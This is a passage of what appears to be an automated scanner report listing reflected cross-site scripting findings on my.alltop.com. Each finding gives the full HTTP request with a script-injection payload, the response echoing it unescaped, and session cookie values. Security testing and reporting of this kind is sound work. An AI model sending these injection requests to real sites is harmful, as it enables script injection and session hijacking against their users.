Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E?46d5b"><script>alert(1)</script>ad51198bb33=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.235. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%22ns=%22netsparker(0x0001FA)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b41"><script>alert(1)</script>571fbeb32e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w65b41"><script>alert(1)</script>571fbeb32e3/%22ns=%22netsparker(0x0001FA) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:10 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:10 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w65b41"><script>alert(1)</script>571fbeb32e3/%22ns=%22netsparker(0x0001FA)" method="post" accept-charset="utf-8">
...[SNIP]...

1.236. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%22ns=%22netsparker(0x0001FA)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8215"><script>alert(1)</script>0bde3212027 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%22nsc8215"><script>alert(1)</script>0bde3212027=%22netsparker(0x0001FA) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%22nsc8215"><script>alert(1)</script>0bde3212027=%22netsparker(0x0001FA)" method="post" accept-charset="utf-8">
...[SNIP]...

1.237. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%22ns=%22netsparker(0x0001FA)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50c1a"><script>alert(1)</script>145d22cac47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%22ns=%22netsparker(0x0001FA)?50c1a"><script>alert(1)</script>145d22cac47=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%22ns=%22netsparker(0x0001FA)?50c1a"><script>alert(1)</script>145d22cac47=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.238. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e2ac"><script>alert(1)</script>d5a39b1a380 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w6e2ac"><script>alert(1)</script>d5a39b1a380/%2522ns%253D%2522netsparker%25280x0001FE%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w6e2ac"><script>alert(1)</script>d5a39b1a380/%2522ns%253D%2522netsparker%25280x0001FE%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.239. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d19"><script>alert(1)</script>897597424cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)87d19"><script>alert(1)</script>897597424cc HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)87d19"><script>alert(1)</script>897597424cc" method="post" accept-charset="utf-8">
...[SNIP]...

1.240. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5ec"><script>alert(1)</script>238b49f1f59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)?2d5ec"><script>alert(1)</script>238b49f1f59=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:09 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)?2d5ec"><script>alert(1)</script>238b49f1f59=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.241. http://my.alltop.com/alpha/x [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/x

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5d00"><script>alert(1)</script>0fd5dd974c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/xc5d00"><script>alert(1)</script>0fd5dd974c7 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:55 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/xc5d00"><script>alert(1)</script>0fd5dd974c7" method="post" accept-charset="utf-8">
...[SNIP]...

1.242. http://my.alltop.com/alpha/x [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/x

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec2bf"><script>alert(1)</script>231b2106e47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/x?ec2bf"><script>alert(1)</script>231b2106e47=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/x?ec2bf"><script>alert(1)</script>231b2106e47=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.243. http://my.alltop.com/alpha/y ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

Issue detail

The value of the '"--></style></script><script>netsparker(0x00020C)</script> request parameter is copied into the HTML document as plain text between tags. The payload c8abe<script>alert(1)</script>1964ca13435 was submitted in the '"--></style></script><script>netsparker(0x00020C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y?'"--></style></script><script>netsparker(0x00020C)</script>c8abe<script>alert(1)</script>1964ca13435 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
